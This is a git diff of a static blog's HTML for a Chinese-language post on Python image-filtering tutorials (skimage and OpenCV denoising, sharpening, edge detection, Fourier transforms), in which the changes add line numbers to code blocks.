    # 遍历所有的文件夹
    for d in dirs:
    print(os.path.join(root, d))
    <generator object walk at 0x000001AAF06406C8>
     .\.ipynb_checkpoints
     .\images
    @@ -4778,6 +4776,8 @@ 

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(29-41)-Image Filtering/index.html b/posts/DIP-Introductory python tutorials for image processing(29-41)-Image Filtering/index.html index c13208d220..75941dde2d 100644 --- a/posts/DIP-Introductory python tutorials for image processing(29-41)-Image Filtering/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(29-41)-Image Filtering/index.html @@ -44,8 +44,6 @@ - - @@ -410,26 +408,26 @@

    缩放

  12. Resize 也有同样的作用,但允许指定输出图像的形状而不是缩放因子。
  13. Downscale 的目的是通过整数因子对 n 维图像进行下采样,使用作为函数参数的大小因子的每个块的元素的局部均值。
  14. -
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    -
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    -
    plt.imshow(img, cmap='gray')
    +
    1
    2
    3
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    +
    1
    2
    3
    4
    5
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    +
    1
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>
     

    png

    -
    plt.imshow(img_rescaled, cmap='gray')
    +
    1
    plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>
     

    png

    -
    plt.imshow(img_resized, cmap='gray')
    +
    1
    plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>
     

    png

    -
    img_downscaled = downscale_local_mean(img, (4, 3))  # 拉伸
    plt.imshow(img_downscaled, cmap='gray')
    +
    1
    2
    img_downscaled = downscale_local_mean(img, (4, 3))  # 拉伸
    plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>
     

    png

    gaussian 模糊

    -
    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
    +
    1
    2
    3
    4
    5
    6
    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
    C:\Users\gzjzx\anaconda3\envs\wxpython37\lib\site-packages\skimage\_shared\utils.py:348: RuntimeWarning: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.
       return func(*args, **kwargs)
     
    @@ -437,7 +435,7 @@ 

    gaussian

    png

    sobel 边缘检测

    -
    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    +
    1
    2
    3
    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>
     

    png
    @@ -445,43 +443,43 @@

    OpenCV 读取到的都是 BGR 颜色通道, 此时使用 matplotlib 显示会导致颜色发生变化

    -
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    +
    1
    2
    3
    4
    5
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>
     

    png

    缩放

    -
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    -
    img.shape
    +
    1
    img.shape
    (400, 200, 3)
     
    -
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
    +
    1
    2
    3
    4
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
    Top left [254   0   0]
     Top right [  1 255 255]
     Bottom left [  1 255   0]
     Bottom right [ 42   0 255]
     

    分离颜色通道

    -
    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]
    +
    1
    2
    3
    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]

    -
    blue, green, red = cv2.split(img)
    -
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    +
    1
    blue, green, red = cv2.split(img)
    +
    1
    2
    3
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    合并颜色通道

    -
    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    +
    1
    2
    3
    4
    5
    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Canny 边缘检测

    -
    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

    $Unsharpened image = original + amount \times (original - blurred)$

    原理

    -
    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
    gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
    img2 = (img - gaussian_img) * 2.
    img3 = img + img2

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
    gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
    img2 = (img - gaussian_img) * 2.
    img3 = img + img2

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()

    png

    unsharp_mask 函数

    -
    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction

      @@ -490,7 +488,7 @@

      skimage.filters.gaussian

    png

    -
    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    #sigma defines the std dev of the gaussian kernel. SLightly different than
    #how we define in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    #sigma defines the std dev of the gaussian kernel. SLightly different than
    #how we define in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 33 - Image filtering in python - Median filter for denoising images

      @@ -498,9 +496,9 @@

      OpenCV

      -
      import cv2
      # Needs 8 bit, not float.
      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

      img = img_gaussian_noise

      median_using_cv2 = cv2.medianBlur(img, 3)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      import cv2
      # Needs 8 bit, not float.
      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

      img = img_gaussian_noise

      median_using_cv2 = cv2.medianBlur(img, 3)

      skimage

      -
      from skimage.filters import median
      from skimage.morphology import disk

      """
      Disk creates a circular structuring element,
      similar to a mask with specific radius
      Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
      """
      disk(3)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      from skimage.filters import median
      from skimage.morphology import disk

      """
      Disk creates a circular structuring element,
      similar to a mask with specific radius
      Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
      """
      disk(3)
      array([[0, 0, 0, 1, 0, 0, 0],
              [0, 1, 1, 1, 1, 1, 0],
              [0, 1, 1, 1, 1, 1, 0],
      @@ -509,38 +507,38 @@ 

      skimage

      [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
      -
      median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
      -
      cv2.imshow('Original', img)
      cv2.imshow('cv2median', median_using_cv2)
      cv2.imshow('Using skimage median', median_using_skimage)

      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
      +
      1
      2
      3
      4
      5
      6
      cv2.imshow('Original', img)
      cv2.imshow('cv2median', median_using_cv2)
      cv2.imshow('Using skimage median', median_using_skimage)

      cv2.waitKey(0)
      cv2.destroyAllWindows()

      png

      Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

      双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

      OpenCV

      -
      import cv2

      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img = img_gaussian_noise
      bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

      cv2.imshow("Original", img)
      cv2.imshow("cv2 bilateral", bilateral_using_cv2)
      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      import cv2

      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img = img_gaussian_noise
      bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

      cv2.imshow("Original", img)
      cv2.imshow("cv2 bilateral", bilateral_using_cv2)
      cv2.waitKey(0)
      cv2.destroyAllWindows()

      png

      Skimage

      视频上说很慢…好像确实挺慢

      -
      import cv2
      from skimage.restoration import denoise_bilateral

      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img = img_gaussian_noise
      bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
      multichannel=False)
      cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      import cv2
      from skimage.restoration import denoise_bilateral

      img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
      img = img_gaussian_noise
      bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
      multichannel=False)
      cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
      cv2.waitKey(0)
      cv2.destroyAllWindows()

      png

      Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

      NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

      png

      OpenCV

      -
      import cv2
      import numpy as np
      from skimage import io, img_as_float
      from skimage.restoration import denoise_nl_means, estimate_sigma

      img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
      sigma_est = np.mean(estimate_sigma(img, multichannel=True)) # 从所有三个通道中选取 Sigma
      +
      1
      2
      3
      4
      5
      6
      7
      import cv2
      import numpy as np
      from skimage import io, img_as_float
      from skimage.restoration import denoise_nl_means, estimate_sigma

      img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
      sigma_est = np.mean(estimate_sigma(img, multichannel=True)) # 从所有三个通道中选取 Sigma
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\3289355486.py:7: FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma`. It will be removed in version 1.0. Please use `channel_axis` instead.
         sigma_est = np.mean(estimate_sigma(img, multichannel=True))
       
      -
      denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, 
      fast_mode=True,
      patch_size=5,
      patch_distance=3,
      multichannel=False)
      +
      1
      2
      3
      4
      5
      denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, 
      fast_mode=True,
      patch_size=5,
      patch_distance=3,
      multichannel=False)
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\4037562389.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means`. It will be removed in version 1.0. Please use `channel_axis` instead.
         denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
       
      -
      cv2.imshow("Original", img)
      cv2.imshow("NLM Filtered", denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      2
      3
      4
      cv2.imshow("Original", img)
      cv2.imshow("NLM Filtered", denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()

      Skimage

      -
      from skimage import img_as_ubyte
      import cv2

      img_as_8btype = img_as_ubyte(img)
      denoise_img_as_8byte = img_as_ubyte(denoise_img)

      original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
      final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

      cv2.imshow("Original", img)
      cv2.imshow("NLM Filtered", denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      from skimage import img_as_ubyte
      import cv2

      img_as_8btype = img_as_ubyte(img)
      denoise_img_as_8byte = img_as_ubyte(denoise_img)

      original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
      final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

      cv2.imshow("Original", img)
      cv2.imshow("NLM Filtered", denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()

      png

      Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

      如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)

      -
      import cv2
      from skimage import io, img_as_float
      from skimage.restoration import denoise_tv_chambolle

      img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
      -
      import matplotlib.pyplot as plt

      plt.hist(img.flat, bins=100, range=(0, 1))
      +
      1
      2
      3
      4
      5
      import cv2
      from skimage import io, img_as_float
      from skimage.restoration import denoise_tv_chambolle

      img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
      +
      1
      2
      3
      import matplotlib.pyplot as plt

      plt.hist(img.flat, bins=100, range=(0, 1))
      (array([3.26417e+05, 3.28804e+05, 2.18786e+05, 3.22133e+05, 2.09763e+05,
               3.05641e+05, 1.95677e+05, 2.78984e+05, 1.75691e+05, 2.45767e+05,
               2.25122e+05, 1.37699e+05, 1.89186e+05, 1.14683e+05, 1.55440e+05,
      @@ -583,16 +581,16 @@ 

      denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
      +
      1
      denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
      C:\Users\gzjzx\AppData\Local\Temp\ipykernel_8228\1044631449.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle`. It will be removed in version 1.0. Please use `channel_axis` instead.
         denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
       
      -
      cv2.imshow('Original', img)
      cv2.imshow('TV Filtered', denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()
      +
      1
      2
      3
      4
      cv2.imshow('Original', img)
      cv2.imshow('TV Filtered', denoise_img)
      cv2.waitKey(0)
      cv2.destroyAllWindows()

      png

      Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

      BM3D 算法学习 - 知乎

      png

      -
      pip install bm3d
      +
      1
      pip install bm3d
      Collecting bm3d
         Downloading bm3d-3.0.9-py3-none-any.whl (8.4 MB)
            ---------------------------------------- 8.4/8.4 MB 2.3 MB/s eta 0:00:00
      @@ -603,7 +601,7 @@ 

      from skimage import io, img_as_float
      import bm3d
      import cv2

      noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

      BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
      +
      1
      2
      3
      4
      5
      6
      7
      from skimage import io, img_as_float
      import bm3d
      import cv2

      noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

      BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
      • bm3d library is not well documented yet, but looking into source code…Bm3d 库还没有很好的文档化,但是查看源代码…
          @@ -618,7 +616,7 @@

          cv2.imshow("Original", noisy_img)
          cv2.imshow("Denoised", BM3D_denoised_image)
          cv2.waitKey(0)
          cv2.destroyAllWindows()
          +
          1
          2
          3
          4
          cv2.imshow("Original", noisy_img)
          cv2.imshow("Denoised", BM3D_denoised_image)
          cv2.waitKey(0)
          cv2.destroyAllWindows()

          png

          Tutorial 38 - Image filtering in python - Edge detection

          Edge Detection filters: 边缘检测滤波器

          @@ -662,10 +660,10 @@

        png

        -
        import cv2

        img = cv2.imread('images/sandstone.tif', 0)
        +
        1
        2
        3
        import cv2

        img = cv2.imread('images/sandstone.tif', 0)

        png

        -
        from skimage.filters import roberts, sobel, scharr, prewitt

        roberts_img = roberts(img)
        sobel_img = sobel(img)
        scharr_img = scharr(img)
        prewitt_img = prewitt(img)
        -
        cv2.imshow("Roberts", roberts_img)
        cv2.imshow("Sobel", sobel_img)
        cv2.imshow("Scharr", scharr_img)
        cv2.imshow("Prewitt", prewitt_img)
        cv2.waitKey(0)
        cv2.destroyAllWindows()
        +
        1
        2
        3
        4
        5
        6
        from skimage.filters import roberts, sobel, scharr, prewitt

        roberts_img = roberts(img)
        sobel_img = sobel(img)
        scharr_img = scharr(img)
        prewitt_img = prewitt(img)
        +
        1
        2
        3
        4
        5
        6
        cv2.imshow("Roberts", roberts_img)
        cv2.imshow("Sobel", sobel_img)
        cv2.imshow("Scharr", scharr_img)
        cv2.imshow("Prewitt", prewitt_img)
        cv2.waitKey(0)
        cv2.destroyAllWindows()

        png

        Tutorial 39 - Image filtering in python - Edge detection using Canny

          @@ -680,7 +678,7 @@

        -
        from skimage import io, filters, feature
        import matplotlib.pyplot as plt
        from skimage.color import rgb2gray
        import cv2
        import numpy as np


        img = cv2.imread('images/sandstone.tif', 0)

        #Canny
        canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

        #Autocanny
        sigma = 0.3
        median = np.median(img)

        # apply automatic Canny edge detection using the computed median
        lower = int(max(0, (1.0 - sigma) * median))
        #Lower threshold is sigma % lower than median
        #If the value is below 0 then take 0 as the value

        upper = int(min(255, (1.0 + sigma) * median))
        #Upper threshold is sigma% higher than median
        #If the value is larger than 255 then take 255 a the value

        auto_canny = cv2.Canny(img, lower, upper)


        cv2.imshow("Canny", canny_edge)
        cv2.imshow("Auto Canny", auto_canny)
        cv2.waitKey(0)
        cv2.destroyAllWindows()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        from skimage import io, filters, feature
        import matplotlib.pyplot as plt
        from skimage.color import rgb2gray
        import cv2
        import numpy as np


        img = cv2.imread('images/sandstone.tif', 0)

        #Canny
        canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

        #Autocanny
        sigma = 0.3
        median = np.median(img)

        # apply automatic Canny edge detection using the computed median
        lower = int(max(0, (1.0 - sigma) * median))
        #Lower threshold is sigma % lower than median
        #If the value is below 0 then take 0 as the value

        upper = int(min(255, (1.0 + sigma) * median))
        #Upper threshold is sigma% higher than median
        #If the value is larger than 255 then take 255 a the value

        auto_canny = cv2.Canny(img, lower, upper)


        cv2.imshow("Canny", canny_edge)
        cv2.imshow("Auto Canny", auto_canny)
        cv2.waitKey(0)
        cv2.destroyAllWindows()

        png

        Tutorial 40 - What is Fourier transform and how is it relevant for image processing

        Fourier Transform 傅里叶变换

        @@ -721,28 +719,28 @@

        代码

        • 创建一个正弦波
        -
        import cv2
        import matplotlib.pyplot as plt
        import numpy as np
        -
        # Generate a 2D sine wave image
        x = np.arange(256) # generate values from 0 to 255 (our image size)
        y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
        # Divide by a smaller number above to increase the frequency.
        y += max(y) # offset sine wave by the max value to go out of negative range of sine

        # Generate a 256 * 256 image (2D array of the sine wave)
        # create 2-D array of sine-wave
        img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
        -
        plt.imshow(img)
        +
        1
        2
        3
        import cv2
        import matplotlib.pyplot as plt
        import numpy as np
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        # Generate a 2D sine wave image
        x = np.arange(256) # generate values from 0 to 255 (our image size)
        y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
        # Divide by a smaller number above to increase the frequency.
        y += max(y) # offset sine wave by the max value to go out of negative range of sine

        # Generate a 256 * 256 image (2D array of the sine wave)
        # create 2-D array of sine-wave
        img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
        +
        1
        plt.imshow(img)
        <matplotlib.image.AxesImage at 0x246a404a700>
         

        png

        -
        # 改变频率
        # Generate a 2D sine wave image
        x = np.arange(256) # generate values from 0 to 255 (our image size)
        y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
        # Divide by a smaller number above to increase the frequency.
        y += max(y) # offset sine wave by the max value to go out of negative range of sine

        # Generate a 256 * 256 image (2D array of the sine wave)
        # create 2-D array of sine-wave
        img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

        plt.imshow(img)
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        # 改变频率
        # Generate a 2D sine wave image
        x = np.arange(256) # generate values from 0 to 255 (our image size)
        y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
        # Divide by a smaller number above to increase the frequency.
        y += max(y) # offset sine wave by the max value to go out of negative range of sine

        # Generate a 256 * 256 image (2D array of the sine wave)
        # create 2-D array of sine-wave
        img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

        plt.imshow(img)
        <matplotlib.image.AxesImage at 0x246a542f1c0>
         

        png

        OpenCV

        -
        dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

        #Shift DFT. First check the output without the shift
        #Without shifting the data would be centered around origin at the top left
        #Shifting it moves the origin to the center of the image.
        dft_shift = np.fft.fftshift(dft)

        #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
        #Added 1 as we may see 0 values and log of 0 is indeterminate
        magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


        #As the spatial frequency increases (bars closer),
        #the peaks in the DFT amplitude spectrum move farther away from the origin

        #Center represents low frequency and the corners high frequency (with DFT shift).
        #To build high pass filter block center corresponding to low frequencies and let
        #high frequencies go through. This is nothing but an edge filter.
        -
        fig = plt.figure(figsize=(12, 12))
        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img)
        ax1.title.set_text('Input Image')
        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(magnitude_spectrum)
        ax2.title.set_text('FFT of image')
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

        #Shift DFT. First check the output without the shift
        #Without shifting the data would be centered around origin at the top left
        #Shifting it moves the origin to the center of the image.
        dft_shift = np.fft.fftshift(dft)

        #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
        #Added 1 as we may see 0 values and log of 0 is indeterminate
        magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


        #As the spatial frequency increases (bars closer),
        #the peaks in the DFT amplitude spectrum move farther away from the origin

        #Center represents low frequency and the corners high frequency (with DFT shift).
        #To build high pass filter block center corresponding to low frequencies and let
        #high frequencies go through. This is nothing but an edge filter.
        +
        1
        2
        3
        4
        5
        6
        7
        8
        fig = plt.figure(figsize=(12, 12))
        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img)
        ax1.title.set_text('Input Image')
